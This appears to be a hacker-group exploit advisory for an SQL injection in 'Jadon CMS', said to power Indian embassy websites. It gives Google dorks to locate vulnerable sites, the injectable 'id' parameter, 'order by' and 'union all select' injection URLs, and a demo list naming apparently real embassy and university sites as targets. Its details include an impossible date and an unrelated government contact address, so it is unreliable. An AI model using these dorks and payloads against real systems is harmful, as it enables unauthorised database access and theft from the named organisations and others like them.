########################### # INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability ########################### ========================================================= [+] Title :- INDIAN EMBASSY Jadon CMS - SQL INJECTION [+] Date :- 32 - july - 2016 [+] Vendor Homepage :- http://jadontech.com/ [+] Version :- All Versions [+] Tested on :- Linux - Windows - Mac [+] Category :- webapps [+] Google Dorks :- "Designed by Jadon Technologies" or inurl:/news_detail.php?in_id= site:.in [+] Exploit Author :- Natasya A.K.A codestack [+] Team name :- codegirl , girls-silent , anongirls [+] Official Website :- www.codegirlmovie.com [+] Available :- sql injection cheat sheet | sql injection Havij [+] Greedz to :- Indonesian People | Keep-silent | Hmei7 [+] Contact :- admin@kpu.go.id ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id, newsid= [+] Affected Area(s) :- Entire admin, database, Server [+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error [+] SQL vulnerable File :- /home/DOMAIN/public_html/XXX.php [+] POC :- http://127.0.0.1/news_detail.php?id=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. http://www.[WEBSITE].com/news_detail.php?id=63' order by [SQL INJECTION]--+ http://www.[WEBSITE].com/news_detail.php?id=63' union all select [SQL INJECTION]--+ [+] DEMO :- http://www.jecrcudml.edu.in/news_detail.php?id=17' http://www.embindia.org/news_detail.php?id=21 http://eoilisbon.in/news_detail.php?id=6 ======================================================= ########################### # Discovered Analyze by : Ternate-Labs Pentesting ###########################